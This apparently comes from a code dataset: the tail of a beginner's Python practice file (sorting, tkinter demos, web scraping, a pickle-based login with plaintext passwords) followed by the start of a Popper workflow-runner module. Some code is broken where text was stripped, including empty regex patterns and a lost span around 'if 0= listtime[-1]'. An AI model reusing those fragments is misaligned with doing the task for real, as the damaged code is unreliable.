5))\nprint(find_list(search_list, 6))\nprint(find_list(search_list, 7))\nprint(find_list(search_list, 9))\n\n########################################################################################\ndef insert_sort(original_list):\n sorted_list = []\n for i in range(0, len(original_list)):\n if len(sorted_list) == 0:\n sorted_list.append(original_list[i])\n continue\n for j in range(len(sorted_list)-1, -1, -1):\n if sorted_list[j] <= original_list[i]:\n sorted_list.insert(j+1, original_list[i])\n break\n if j == 0:\n sorted_list.insert(0, original_list[i])\n return sorted_list\n #original_list[:] = sorted_list[:]\n\nlist1 = [2,3,5,6,7,4,32,4,2,1,1,0]\nprint(insert_sort(list1))\n\n\ndef bubble_sort(original_list):\n for i in range(len(original_list), 0, -1):\n for j in range(0, i-1):\n if original_list[j] > original_list[j+1]:\n original_list[j], original_list[j+1] = original_list[j+1], original_list[j]\n\n\nlist1 = [2,3,5,6,7,4,32,4,2,1,1,0]\nprint(insert_sort(list1))\n\n########################################################################################\ndef bubble_sort(original_list):\n for i in range(len(original_list), 0, -1):\n for j in range(0, i-1):\n if original_list[j] >= original_list[j+1]:\n original_list[j], original_list[j+1] = original_list[j+1], original_list[j]\n\n########################################################################################\nimport tkinter as tk\nfrom tkinter import messagebox\nimport requests\n\ndef translate():\n content = Entry1.get()\n if content == '':\n messagebox.showinfo('提示', '输入不能为空')\n else:\n url = 'http://fanyi.youdao.com/translate?smartresult=dict&smartresult=rule'\n header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '\n 'AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/67.0.3396.99 Safari/537.36'}\n\n data = {}\n data['i'] = content\n data['from'] = 'AUTO'\n data['to'] = 'AUTO'\n data['smartresult'] = 'dict'\n data['client'] = 'fanyideskweb'\n #data['salt'] = ''\n #data['sign'] = ''\n data['doctype'] = 'json'\n data['version'] = '2.1'\n data['keyfrom'] = 'fanyi.web'\n data['action'] = 'FY_BY_CLICKBUTTION'\n data['typoResult'] = 'false'\n\n result = requests.post(url, data=data, headers=header)\n trans_result = result.json()\n trans_result = trans_result['translateResult'][0][0]['tgt']\n res.set(trans_result)\n\n\nmy_translate = tk.Tk()\nmy_translate.title('翻译')\nmy_translate.geometry('450x110+1080+440')\nres = tk.StringVar()\n\nLabel1 = tk.Label(my_translate, text='输入要翻译的文字', font=('经典细圆简', 18), fg='cyan')\nLabel2 = tk.Label(my_translate, text='翻译后的文字', font=('华文行楷', 20))\nLabel1.grid()\nLabel2.grid()\n\nEntry1 = tk.Entry(my_translate, font=('微软雅黑', 15))\nEntry2 = tk.Entry(my_translate, font=('微软雅黑', 15), textvariable=res)\nEntry1.grid(row=0, column=1)\nEntry2.grid(row=1, column=1)\n\nButton1 = tk.Button(my_translate, text='翻译', width=6, font=('微软雅黑', 16), fg='#321663', command=translate)\nButton2 = tk.Button(my_translate, text='退出', width=6, font=('微软雅黑', 14), fg='#321663', command=my_translate.quit)\nButton1.grid(stick='W')\nButton2.grid(row=2, column=1, stick='e')\n\nmy_translate.mainloop()\n\n########################################################################################\ndef medx():\n for x in range(1, 10):\n for y in range(1, x+1):\n print('%d*%d=%d ' % (y, x, x*y), end='\\t')\n print('')\n\n\n row = 1\n while row<=9:\n col = 1\n while col<=row:\n print('%d*%d=%d ' % (col, row, row*col), end='\\t')\n col += 1\n print('')\n row += 1\n\nimport re\nimport requests\nprint('xxx')\ncontent = requests.get('https://book.douban.com/').text\npattern = re.compile('(.*?)
', re.S)\nresults = re.findall(pattern, content)\n\n\n\nfor result in results:\n url, name = result\n #name = re.sub('\\s','',name)\n print(url, name.strip())\n########################################################################################\nimport re\nimport requests\nprint('xxx')\ncontent = requests.get('https://book.douban.com/').text\npattern = re.compile('(.*?)', re.S)\nresults = re.findall(pattern, content)\n\n\n\nfor result in results:\n url, name = result\n #name = re.sub('\\s','',name)\n print(url, name.strip())\n\nimport re\nimport requests\nprint('xxx')\n#re.match/re.search\ncontent = requests.get('https://book.douban.com/').text\npattern = re.compile('(.*?)', re.S)\nresults = re.findall(pattern, content)\n\n\n\nfor result in results:\n url, name = result\n #name = re.sub('\\s','',name)\n print(url, name.strip())\n\n########################################################################################\nimport tkinter as tk\n\nwindow = tk.Tk()\nwindow.title('my_window')\nwindow.geometry('400x400+500+1400')\n\nv1 = tk.StringVar()\nv2 = tk.StringVar()\nv3 = tk.StringVar()\n\non_hit = False\ndef hit_me():\n global on_hit\n if on_hit == False:\n v1.set('outch!')\n on_hit = True\n else:\n v1.set('')\n on_hit = False\n\ndef insert_button():\n v2 = e1.get()\n t1.insert('insert', v2)\n\ndef end_button():\n v3 = e1.get()\n t1.insert(.2, v3)\n\n\ne1 = tk.Entry(window, show=None, bg='#d28990', font=('Arial', 14), width=25)\ne1.pack()\n\n#l1 = tk.Label(window, textvariable=by_hit, bg='cyan', font=('Arial', 14), width=25, height=3)\n\n\n\nb1 = tk.Button(window, command=insert_button, text='insert point', bg='#273784', font=('微软雅黑', 14), width=20, height=3)\nb2 = tk.Button(window, command=end_button, text='insert end', bg='#773784', font=('微软雅黑', 14), width=20, height=3)\nb1.pack()\nb2.pack()\n\nt1 = tk.Text(window, height=3, bg='white' )\nt1.pack()\n\nwindow.mainloop()\n\n########################################################################################\nv4 = tk.StringVar()\nv4.set([11, 22, 33, 44])\n\nlb1 = tk.Listbox(window, listvariable=v2)\nlb1.pack()\n\nlist_item = [1, 2, 3, 4]\nfor item in list_item:\n lb1.insert('end', item)\n\nlb1.insert(0, 'xx', 'yy')\nlb1.delete(2)\nlb1.insert('end', 't')\n\n########################################################################################\nv1 = tk.StringVar()\n\ndef print_selection():\n l1.config(text='you have selected '+v1.get())\n\nl1 = tk.Label(window, text='', bg='cyan', font=('Arial', 14), width=25, height=3)\nl1.pack()\n\nr1 = tk.Radiobutton(window, text='Option A', variable=v1, value='A', command=print_selection, bg='green')\n\n########################################################################################\ndef press_selection(v):\n l1.config(text='to: '+v)\n\nl1 = tk.Label(window, text='', bg='cyan', font=('Arial', 14), width=25, height=3)\nl1.pack()\n\ns = tk.Scale(window, label='my name is try me', from_=5, to=15,\n orient=tk.HORIZONTAL, length=200, showvalue=0, tickinterval=2,\n resolution=0.001, command=press_selection)\ns.pack()\n\n########################################################################################\nv1 = tk.IntVar()\nv2 = tk.IntVar()\n\ndef press_selection():\n if (v1.get()==1) and (v2.get()==0):\n l1.config(text='just Python')\n elif (v1.get() == 0) and (v2.get() == 0):\n l1.config(text='Neither')\n elif (v1.get() == 0) and (v2.get() == 1):\n l1.config(text='C+ ')\n else:\n l1.config(text='Both ')\n\n\nl1 = tk.Label(window, text='please select', bg='cyan', font=('Arial', 14), width=25, height=3)\nl1.pack()\n\nc1 = tk.Checkbutton(window, text='Python', variable=v1, onvalue=1, offvalue=0, command=press_selection)\nc2 = tk.Checkbutton(window, text='C+ ', variable=v2, onvalue=1, offvalue=0, command=press_selection)\nc1.pack()\nc2.pack()\n\n########################################################################################\ndef move_it():\n canvas.move(arc, 1, 2)\n\ncanvas = tk.Canvas(window, bg='pink', height=200, width=200)\n#image_file = tk.PhotoImage(file='01.gif') #import images filed\n#image = canvas.create_image(10, 10, anchor='SW', image=image_file)\n\nx0,y0,x1,y1 = 50,50,80,80\nline = canvas.create_line(x0,y0,x1,y1, fill='white')\noval = canvas.create_oval(x0,y0,x1,y1, fill='red')\narc = canvas.create_arc(x0+30,y0,x1+30,y1, fill='green', start=0, extent=320)\n\ncanvas.pack()\n\n\nbutton = tk.Button(window, text='move', command=move_it).pack()\n\n########################################################################################\nimport tkinter as tk\n\nwindow = tk.Tk()\nwindow.title('my_window')\nwindow.geometry('400x400+500+1400')\n\ncount = 1\ndef do_job():\n global count\n l.config(text='do'+str(count))\n count += 1\n\nmenubar = tk.Menu(window)\n\nfilemenu = tk.Menu(menubar, tearoff=1)\nmenubar.add_cascade(label='File', menu=filemenu)\nfilemenu.add_command(label='New', command=do_job)\nfilemenu.add_command(label='Open', command=do_job)\nfilemenu.add_command(label='Save', command=do_job)\nfilemenu.add_separator() #separator line\nfilemenu.add_command(label='Exit', command=window.quit)\n\neditmenu = tk.Menu(menubar, tearoff=0)\nmenubar.add_cascade(label='Edit', menu=editmenu)\neditmenu.add_command(label='Cut', command=do_job)\neditmenu.add_command(label='Copy', command=do_job)\neditmenu.add_command(label='Paste', command=do_job)\neditmenu.add_separator()\neditmenu.add_command(label='Close', command=window.quit)\n\nsubmenu = tk.Menu(filemenu, tearoff=0)\nfilemenu.add_cascade(label='Import', menu=submenu, underline=0) #add arrow\nsubmenu.add_command(label='Submenu', command=do_job)\n\nsubmenu1 = tk.Menu(submenu, tearoff=0)\nsubmenu.add_cascade(label='Outport', menu=submenu1, underline=0)\nsubmenu1.add_command(label='Submenu1', command=do_job)\n\nwindow.config(menu=menubar)\n\nl = tk.Label(window, bg='cyan', width=25, height=5)\nl.pack() #when use l.config,can not use:l = tk.Label().pack()\n\nwindow.mainloop()\n\n########################################################################################\nl1 = tk.Label(window, text='On the window', bg='cyan', width=25, height=5).pack()\n\nframe = tk.Frame(window)\nframe.pack()\n\nframe_left = tk.Frame(frame)\nframe_right = tk.Frame(frame)\nframe_left.pack(side='left')\nframe_right.pack(side='right')\n\n\nl2 = tk.Label(frame_left, text='On the left', bg='cyan', width=25, height=5).pack()\nl3 = tk.Label(frame_right, text='On the right', bg='cyan', width=25, height=5).pack()\n\n########################################################################################\ndef tan_chuang():\n #tk.messagebox.showinfo(title='Error', message='Mistake')\n #tk.messagebox.showwarning(title='Error', message='Mistake')\n #tk.messagebox.showerror(title='Error', message='Mistake')\n #print(tk.messagebox.askquestion(title='Error', message='Mistake')) #return yes/no\n print(tk.messagebox.askyesno(title='Error', message='Mistake')) #return True/False\n\ntk.Button(window, command=tan_chuang, width=30).pack()\n\n########################################################################################\ntk.Label(window).pack(side='top') #pack(side='top/button/left/right')\n\nfor i in range(4):\n for j in range(3):\n tk.Label(window, text=1).grid(row=i, column=j,padx=10, pady=10)\n\ntk.Label(window, text=1).place(x=10, y=100, anchor='nw') #anchor=''nw/n/s/e/w/center\n\n########################################################################################\n#sign window\nimport tkinter as tk\nfrom tkinter import messagebox\nimport pickle\n\nwindow = tk.Tk()\nwindow.title('my_window')\nwindow.geometry('500x400+500+1400')\n\nvar_user_name = tk.StringVar()\nvar_user_pwd = tk.StringVar()\nvar_user_name.set('xxx@gmail.com')\n\n\ndef user_login():\n user_name = var_user_name.get()\n user_pwd = var_user_pwd.get()\n\n try:\n with open('user_info.pickle', 'rb') as user_file:\n user_info = pickle.load(user_file)\n except FileNotFoundError:\n with open('user_info.pickle', 'wb') as user_file:\n user_info = {'admin': 'admin'}\n pickle.dump(user_info, user_file)\n\n if user_name in user_info:\n if user_pwd == user_info[user_name]:\n tk.messagebox.showinfo(title='Welcome', message='How are you?\\n\\n\\t' + user_name)\n else:\n tk.messagebox.showinfo(title='Error', message='password wrong!')\n else:\n is_sign_up = tk.messagebox.askyesno('Welcome', 'you have not sign up,sign up now?')\n if is_sign_up:\n user_sgin_up()\n\n\ndef user_sgin_up():\n def sign_to_my_window():\n\n new_name = var_new_name.get()\n new_pwd = var_new_pwd.get()\n new_pwd_confirm = var_new_pwd_confirm.get()\n\n with open('user_info.pickle', 'rb') as user_file:\n exist_user_info = pickle.load(user_file)\n if new_pwd != new_pwd_confirm:\n tk.messagebox.showerror('Error', 'confirm the same password')\n elif new_name in exist_user_info:\n tk.messagebox.showerror('Error', 'The user has been signed up')\n else:\n exist_user_info[new_name] = new_pwd\n with open('user_info.pickle', 'wb') as user_file:\n pickle.dump(exist_user_info, user_file)\n tk.messagebox.showinfo('Welcome', 'succeed')\n window_sign_up.destroy()\n\n window_sign_up = tk.Toplevel(window)\n window_sign_up.geometry('350x200+600+1500')\n window_sign_up.title('Sign up window')\n\n var_new_name = tk.StringVar()\n var_new_pwd = tk.StringVar()\n var_new_pwd_confirm = tk.StringVar()\n var_new_name.set('xxx@gmail.com')\n\n tk.Label(window_sign_up, text='User name', bg='pink').place(x=75, y=50)\n tk.Label(window_sign_up, text='Password', bg='pink').place(x=80, y=80)\n tk.Label(window_sign_up, text='Password confirm', bg='pink').place(x=40, y=110)\n\n tk.Entry(window_sign_up, textvariable=var_new_name).place(x=150, y=50)\n tk.Entry(window_sign_up, textvariable=var_new_pwd).place(x=150, y=80)\n tk.Entry(window_sign_up, textvariable=var_new_pwd_confirm).place(x=150, y=110)\n\n tk.Button(window_sign_up, text='Yes', width=6, command=sign_to_my_window).place(x=80, y=160)\n tk.Button(window_sign_up, text='Cancel', command=window_sign_up.destroy).place(x=230, y=160)\n\n\ncanvas = tk.Canvas(window, height=200, width=500, bg='pink')\n# image_file = tk.PhotoImage(file='xxx')\n# image = canvas.create_image(0,0, anchor='nw', image=image_file)\ncanvas.create_oval(200, 200, 100, 100, fill='green')\ncanvas.create_oval(100, 100, 400, 400, fill='green')\ncanvas.pack(side='top')\n\nlabel_name = tk.Label(window, text='User name', bg='cyan').place(x=100, y=270, anchor='sw')\nlabel_pwd = tk.Label(window, text='Password', bg='cyan').place(x=100, y=300)\n\nentry_name = tk.Entry(window, textvariable=var_user_name, font=('Arial', 14)).place(x=170, y=270, anchor='sw')\nentry_pwd = tk.Entry(window, textvariable=var_user_pwd, font=('Arial', 14), show='*').place(x=170, y=300)\n\nbutton_login = tk.Button(window, text='Log in', command=user_login).place(x=100, y=350)\nbutton_signout = tk.Button(window, text='Sign up', command=user_sgin_up).place(x=350, y=350)\n\nwindow.mainloop()\n\n########################################################################################\nimport time\n\nstart1 = time.time()\n\nfor i in range(1000):\n result = []\n for j in range(20000):\n result.append(i*1000 + j*10)\n\nend1 = time.time()\n\nprint(end1 - start1)\n\n\nstart2 = time.time()\n\nfor i in range(1000):\n result = []\n x = i*1000\n for j in range(20000):\n result.append(x + j*10)\n\nend2 = time.time()\n\nprint(end2 - start2)\n\n\n########################################################################################\ndef func(n):\n if n==1 or n==0:\n return 1\n return n*func(n-1)\n\n\nprint(list(func(x) for x in range(0,15)))\n#for x in range(0,15):\n #print(x,'\\t!= : ',func(x))\n\n########################################################################################\ndef func(ischinese, first_name, last_name):\n\n def inner(first_name, last_name):\n print('{0} {1}'.format(first_name, last_name))\n\n if ischinese:\n inner(first_name, last_name)\n else:\n inner(last_name, first_name)\n\nfunc(False, 'DUCK', 'BUBBY')\nfunc(True, '李', '凉')\n\n########################################################################################\n#组合,Demo()是Stu()的一个属性\nclass Demo:\n\n def say(self):\n print('xxx')\n\nclass Stu():\n\n def __init__(self, a):\n self.a = a\n\nStu(Demo()).a.say()\n\n########################################################################################\n#Factory pattern\nclass Factory():\n\n def creat_car(self, brand):\n if brand == 'BMW':\n print('BMW is building...')\n elif brand == 'BENZ':\n print('BENZ is building...')\n elif brand == 'BYD':\n print('BYD is building...')\n else:\n print('Error')\n\n\ncar1 = Factory().creat_car('BMW')\ncar2 = Factory().creat_car('B')\n\n#Singleton pattern\nclass MySingleton():\n\n __obj = None\n __init_flag = True\n\n def __new__(cls, *args, **kwargs): #cls.__obj == class().__obj\n if cls.__obj == None:\n cls.__obj = object.__new__(cls)\n return cls.__obj\n\n\n def __init__(self, name):\n if MySingleton.__init_flag:\n print('init.....')\n self.name = name\n MySingleton.__init_flag = False\n\na = MySingleton('aa')\nb = MySingleton('bb')\nprint(a)\nprint(b)\n\n#Singleton and Factory\nclass SingletonFactory():\n\n __obj = None\n __init_flag = True\n\n def __new__(cls, *args, **kwargs):\n if cls.__obj == None:\n cls.__obj = object.__new__(cls)\n return cls.__obj\n\n def creat_car(self, brand):\n if brand == 'BMW':\n print('BMW is building...')\n elif brand == 'BENZ':\n print('BENZ is building...')\n elif brand == 'BYD':\n print('BYD is building...')\n else:\n print('Error')\n\n def __init__(self):\n if SingletonFactory.__init_flag == True:\n print('BUILDING')\n SingletonFactory.__init_flag = False\n\ncar3 = SingletonFactory()\ncar3.creat_car('BMW')\ncar4 = SingletonFactory()\ncar4.creat_car('BENZ')\nprint(car3)\nprint(car4)\n\n\n########################################################################################\nyear = int(input('year:'))\nmonth = int(input('month:'))\nday = int(input('day:'))\n\nadd_days = (0,31,59,90,120,151,181,212,243,273,304,334)\n\n\nif (year % 4 == 0) and (year % 400 == 0) and (year % 100 != 0):\n extra = 1\nelse:\n extra = 0\n\nif 0= listtime[-1]:\n print(timedict[listtime[-1]])\n break\n\n########################################################################################\nimport time\n\nmusicLrc = '''\n[00:08:50][00:19:21][00:32:21]1111\n[00:56:21][01:02:21]2222\n[01:13:21]33333\n[02:17:21]44444\n[02:56:21]55555\n[03:14:21]66666\n[03:25:21]7777777\n[03:31:21]888888\n'''\nlrcLineList = musicLrc.splitlines()\ntimedict = {}\n\nfor lrcLine in lrcLineList:\n lrclinelist = lrcLine.split(']') #[00:08:50, [00:19:21, [00:32:21 , 1111\n for i in range(len(lrclinelist) - 1):\n timeStr = lrclinelist[i][1:]\n timeList = timeStr.split(':')\n time1 = float(timeList[0])*60 +float(timeList[1]) #不能使用float(timeList[0]*60)\n timedict[time1] = lrclinelist[-1]\n\n\nlisttime = []\nfor i in timedict.keys():\n listtime.append(i)\nprint(timedict)\n\ngetTime = 0\nwhile True:\n for n in range(len(listtime)):\n if getTime < listtime[n]:\n break\n\n lrc = timedict.get(listtime[n])\n\n if lrc == None:\n pass\n else:\n print(lrc)\n\n time.sleep(0.05)\n getTime += 1\n\n########################################################################################\n#decorator\ndef outer(func):\n def inner(age):\n if age < 0:\n age = 0\n func(age)\n return inner\n\n@outer #say = outer(say)\ndef say(age): #上面有while True:所以unreachable\n print(age)\nsay = outer(say)(15)\n\n########################################################################################\n","sub_path":"python/Practice/th.py","file_name":"th.py","file_ext":"py","file_size_in_byte":36375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"252769077","text":"from __future__ import unicode_literals\nimport multiprocessing as mp\nimport os\nimport shutil\nimport subprocess\nimport time\nfrom builtins import dict, input, str\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nfrom distutils.dir_util import copy_tree\n\nimport docker\nimport hcl\nimport popper.cli\nfrom popper import scm, utils as pu\nfrom spython.main import Client as sclient\n\n\nclass Workflow(object):\n \"\"\"A GHA workflow.\n \"\"\"\n\n def __init__(self, wfile, workspace, quiet, debug, dry_run,\n reuse, parallel):\n wfile = pu.find_default_wfile(wfile)\n\n with open(wfile, 'r') as fp:\n self.wf = hcl.load(fp)\n\n self.workspace = workspace\n self.debug = debug\n if debug:\n self.quiet = False\n else:\n self.quiet = quiet\n self.dry_run = dry_run\n self.reuse = reuse\n self.parallel = parallel\n\n self.actions_cache_path = os.path.join('/', 'tmp', 'actions')\n self.validate_syntax()\n self.check_secrets()\n self.normalize()\n self.complete_graph()\n\n def validate_syntax(self):\n \"\"\" Validates the .workflow file.\n \"\"\"\n resolves_present = False\n uses_present = False\n if not self.wf.get('workflow', None):\n pu.fail('A workflow block must be present\\n')\n else:\n for _, wf_block in dict(self.wf['workflow']).items():\n if wf_block.get('resolves', None):\n resolves_present = True\n if not resolves_present:\n pu.fail('[resolves] attribute must be present\\n')\n if not self.wf.get('action', None):\n pu.fail('Atleast one action block must be present\\n')\n else:\n for _, a_block in self.wf['action'].items():\n if a_block.get('uses', None):\n uses_present = True\n if not uses_present:\n pu.fail('[uses] attribute must be present\\n')\n\n def is_list_of_strings(self, lst):\n try:\n basestring\n except UnboundLocalError:\n basestring = str\n return bool(lst) and isinstance(lst, list) and all(\n isinstance(elem, basestring) for elem in lst)\n\n def normalize(self):\n \"\"\"normalize the dictionary representation of the workflow\"\"\"\n\n # modify from this:\n #\n # \"workflow\": {\n # \"test-and-deploy\": {\n # \"resolves\": \"deploy\"\n # }\n # }\n #\n # to this:\n #\n # \"workflow\": {\n # \"name\": \"test-and-deploy\",\n # \"on\": \"push\",\n # \"resolves\": \"deploy\"\n # }\n for wf_name, wf_block in dict(self.wf['workflow']).items():\n self.wf['name'] = wf_name\n self.wf['on'] = wf_block.get('on', 'push')\n self.wf['resolves'] = wf_block['resolves']\n\n # python 2 to 3 compatibility\n try:\n basestring\n except UnboundLocalError:\n basestring = str\n\n # create a list for all attributes that can be either string or list\n if isinstance(self.wf['resolves'], basestring):\n self.wf['resolves'] = [self.wf['resolves']]\n elif not self.is_list_of_strings(self.wf['resolves']):\n pu.fail('[resolves] must be a list of strings or a string\\n')\n if not isinstance(self.wf['on'], basestring):\n pu.fail('[on] attribute must be a string\\n')\n for _, a_block in self.wf['action'].items():\n if not isinstance(a_block['uses'], basestring):\n pu.fail('[uses] attribute must be a string\\n')\n if a_block.get('needs', None):\n if isinstance(a_block['needs'], basestring):\n a_block['needs'] = [a_block['needs']]\n elif not self.is_list_of_strings(a_block['needs']):\n pu.fail(\n '[needs] attribute must be a list of strings \\\n or a string\\n')\n if a_block.get('runs', None):\n if isinstance(a_block['runs'], basestring):\n a_block['runs'] = [a_block['runs']]\n elif not self.is_list_of_strings(a_block['runs']):\n pu.fail(\n '[runs] attribute must be a list of strings \\\n or a string\\n')\n if a_block.get('args', None):\n if isinstance(a_block['args'], basestring):\n a_block['args'] = a_block['args'].split()\n elif not self.is_list_of_strings(a_block['args']):\n pu.fail(\n '[args] attribute must be a list of strings \\\n or a string\\n')\n if a_block.get('env', None):\n if not isinstance(a_block['env'], dict):\n pu.fail('[env] attribute must be a dict\\n')\n if a_block.get('secrets', None):\n if not self.is_list_of_strings(a_block['secrets']):\n pu.fail('[secrets] attribute must be a list of strings\\n')\n\n def complete_graph(self):\n \"\"\"A GHA workflow is defined by specifying edges that point to the\n previous nodes they depend on. To make the workflow easier to process,\n we add forward edges. We also obtains the root nodes.\n \"\"\"\n root_nodes = set()\n\n for name, a_block in self.wf['action'].items():\n\n a_block['name'] = name\n\n for n in a_block.get('needs', []):\n if not self.wf['action'][n].get('next', None):\n self.wf['action'][n]['next'] = set()\n self.wf['action'][n]['next'].add(name)\n\n if not a_block.get('needs', None):\n root_nodes.add(name)\n\n self.wf['root'] = root_nodes\n\n def check_secrets(self):\n if self.dry_run:\n return\n for _, a in self.wf['action'].items():\n for s in a.get('secrets', []):\n if s not in os.environ:\n if os.environ.get('CI') == \"true\":\n pu.fail('Secret {} not defined\\n.'.format(s))\n else:\n val = input(\"Enter the value for {0}:\\n\".format(s))\n os.environ[s] = val\n\n def download_actions(self):\n \"\"\"Clone actions that reference a repository.\"\"\"\n cloned = set()\n infoed = False\n for _, a in self.wf['action'].items():\n if ('docker://' in a['uses'] or\n 'shub://' in a['uses'] or\n './' in a['uses']):\n continue\n\n url, service, user, repo, action, action_dir, version = pu.parse(\n a['uses'])\n\n repo_parent_dir = os.path.join(\n self.actions_cache_path, service, user\n )\n a['repo_dir'] = os.path.join(repo_parent_dir, repo)\n a['action_dir'] = action_dir\n if '{}/{}'.format(user, repo) in cloned:\n continue\n\n if not os.path.exists(repo_parent_dir):\n os.makedirs(repo_parent_dir)\n\n if not self.dry_run:\n if not infoed:\n pu.info('[popper] cloning actions from repositories\\n')\n infoed = True\n\n scm.clone(url, user, repo, repo_parent_dir, version,\n debug=self.debug)\n\n cloned.add('{}/{}'.format(user, repo))\n\n def instantiate_runners(self):\n \"\"\"Factory of ActionRunner instances, one for each action\"\"\"\n for _, a in self.wf['action'].items():\n if 'docker://' in a['uses']:\n a['runner'] = DockerRunner(\n a, self.workspace, self.env,\n self.quiet, self.debug, self.dry_run)\n continue\n\n if 'shub://' in a['uses']:\n a['runner'] = SingularityRunner(\n a, self.workspace, self.env,\n self.quiet, self.debug, self.dry_run)\n continue\n\n if './' in a['uses']:\n if os.path.exists(os.path.join(a['uses'], 'Dockerfile')):\n a['runner'] = DockerRunner(\n a, self.workspace, self.env,\n self.quiet, self.debug, self.dry_run)\n elif os.path.exists(os.path.join(a['uses'],\n 'singularity.def')):\n a['runner'] = SingularityRunner(\n a, self.workspace, self.env,\n self.quiet, self.debug, self.dry_run)\n else:\n a['runner'] = HostRunner(\n a, self.workspace, self.env,\n self.quiet, self.debug, self.dry_run)\n continue\n\n dockerfile_path = os.path.join(a['repo_dir'], a['action_dir'],\n 'Dockerfile')\n singularityfile_path = os.path.join(a['repo_dir'], a['action_dir'],\n 'singularity.def')\n\n if os.path.exists(dockerfile_path):\n a['runner'] = DockerRunner(\n a, self.workspace, self.env,\n self.quiet, self.debug, self.dry_run)\n elif os.path.exists(singularityfile_path):\n a['runner'] = SingularityRunner(\n a, self.workspace, self.env,\n self.quiet, self.debug, self.dry_run)\n else:\n a['runner'] = HostRunner(\n a, self.workspace, self.env,\n self.quiet, self.debug, self.dry_run)\n\n def run(self, action_name=None, reuse=False, parallel=False):\n \"\"\"Run the pipeline or a specific action\"\"\"\n os.environ['WORKSPACE'] = self.workspace\n\n if scm.get_user():\n repo_id = '{}/{}'.format(scm.get_user(), scm.get_name())\n else:\n repo_id = 'unknown'\n\n self.env = {\n 'GITHUB_WORKSPACE': self.workspace,\n 'GITHUB_WORKFLOW': self.wf['name'],\n 'GITHUB_ACTOR': 'popper',\n 'GITHUB_REPOSITORY': repo_id,\n 'GITHUB_EVENT_NAME': self.wf['on'],\n 'GITHUB_EVENT_PATH': '/{}/{}'.format(self.workspace,\n 'workflow/event.json'),\n 'GITHUB_SHA': scm.get_sha(self.debug),\n 'GITHUB_REF': scm.get_ref()\n }\n\n for e in dict(self.env):\n self.env.update({e.replace('GITHUB_', 'POPPER_'): self.env[e]})\n\n self.download_actions()\n self.instantiate_runners()\n\n if action_name:\n self.wf['action'][action_name]['runner'].run(reuse)\n else:\n for s in self.get_stages():\n self.run_stage(s, reuse, parallel)\n\n def run_stage(self, stage, reuse=False, parallel=False):\n if parallel:\n with ThreadPoolExecutor(max_workers=mp.cpu_count()) as ex:\n flist = {\n ex.submit(self.wf['action'][a]['runner'].run, reuse):\n a for a in stage\n }\n popper.cli.flist = flist\n for future in as_completed(flist):\n future.result()\n pu.info('Action ran successfully !\\n')\n else:\n for action in stage:\n self.wf['action'][action]['runner'].run(reuse)\n\n @pu.threadsafe_generator\n def get_stages(self):\n \"\"\"Generator of stages. A stages is a list of actions that can be\n executed in parallel.\n \"\"\"\n current_stage = self.wf['root']\n\n while current_stage:\n yield current_stage\n next_stage = set()\n for n in current_stage:\n next_stage.update(self.wf['action'][n].get('next', set()))\n current_stage = next_stage\n\n @staticmethod\n def import_from_repo(path, project_root):\n parts = pu.get_parts(path)\n if len(parts) < 3:\n pu.fail(\n 'Required url format: \\\n //[/folder[/wf.workflow]]'\n )\n\n url, service, user, repo, _, _, version = pu.parse(path)\n cloned_project_dir = os.path.join(\"/tmp\", service, user, repo)\n scm.clone(url, user, repo, os.path.dirname(\n cloned_project_dir), version\n )\n\n if len(parts) == 3:\n ptw_one = os.path.join(cloned_project_dir, \"main.workflow\")\n ptw_two = os.path.join(cloned_project_dir, \".github/main.workflow\")\n if os.path.isfile(ptw_one):\n path_to_workflow = ptw_one\n elif os.path.isfile(ptw_two):\n path_to_workflow = ptw_two\n else:\n pu.fail(\"Unable to find a .workflow file\")\n elif len(parts) >= 4:\n path_to_workflow = os.path.join(\n cloned_project_dir, '/'.join(parts[3:])).split(\"@\")[0]\n if not os.path.basename(path_to_workflow).endswith('.workflow'):\n path_to_workflow = os.path.join(\n path_to_workflow, 'main.workflow')\n if not os.path.isfile(path_to_workflow):\n pu.fail(\"Unable to find a .workflow file\")\n\n shutil.copy(path_to_workflow, project_root)\n pu.info(\"Successfully imported from {}\\n\".format(path_to_workflow))\n\n with open(path_to_workflow, 'r') as fp:\n wf = hcl.load(fp)\n\n action_paths = list()\n if wf.get('action', None):\n for _, a_block in wf['action'].items():\n if a_block['uses'].startswith(\"./\"):\n action_paths.append(a_block['uses'])\n\n action_paths = set([a.split(\"/\")[1] for a in action_paths])\n for a in action_paths:\n copy_tree(os.path.join(cloned_project_dir, a),\n os.path.join(project_root, a))\n pu.info(\"Copied {} to {}...\\n\".format(os.path.join(\n cloned_project_dir, a), project_root))\n\n\nclass ActionRunner(object):\n \"\"\"An action runner.\n \"\"\"\n\n def __init__(self, action, workspace, env, quiet, debug, dry_run):\n self.action = action\n self.workspace = workspace\n self.env = env\n self.quiet = quiet\n self.debug = debug\n self.dry_run = dry_run\n self.msg_prefix = \"DRYRUN: \" if dry_run else \"\"\n\n if not os.path.exists(self.workspace):\n os.makedirs(self.workspace)\n\n self.log_path = os.path.join(self.workspace, 'popper_logs')\n if not os.path.exists(self.log_path):\n os.makedirs(self.log_path)\n self.log_filename = os.path.join(\n self.log_path, self.action['name'].replace(' ', '-'))\n\n def run(self, reuse=False):\n raise NotImplementedError(\n \"This method is required to be implemented in derived classes.\"\n )\n\n\nclass DockerRunner(ActionRunner):\n def __init__(self, action, workspace, env, q, d, dry):\n super(DockerRunner, self).__init__(action, workspace, env, q, d, dry)\n self.cid = self.action['name'].replace(' ', '_')\n self.docker_client = docker.from_env()\n self.container = None\n\n def run(self, reuse=False):\n build = True\n\n if 'docker://' in self.action['uses']:\n tag = self.action['uses'].replace('docker://', '')\n build = False\n elif './' in self.action['uses']:\n action_dir = os.path.basename(\n self.action['uses'].replace('./', ''))\n\n if self.env['GITHUB_REPOSITORY'] == 'unknown':\n repo_id = ''\n else:\n repo_id = self.env['GITHUB_REPOSITORY']\n\n if action_dir:\n repo_id += '/'\n\n tag = (\n 'popper/' + repo_id + action_dir + ':' + self.env['GITHUB_SHA']\n )\n\n dockerfile_path = os.path.join(os.getcwd(), self.action['uses'])\n else:\n tag = '/'.join(self.action['uses'].split('/')[:2])\n dockerfile_path = os.path.join(self.action['repo_dir'],\n self.action['action_dir'])\n\n if not reuse:\n if self.docker_exists():\n self.docker_rm()\n if build:\n self.docker_build(tag, dockerfile_path)\n else:\n self.docker_pull(tag)\n self.docker_create(tag)\n else:\n if not self.docker_exists():\n if build:\n 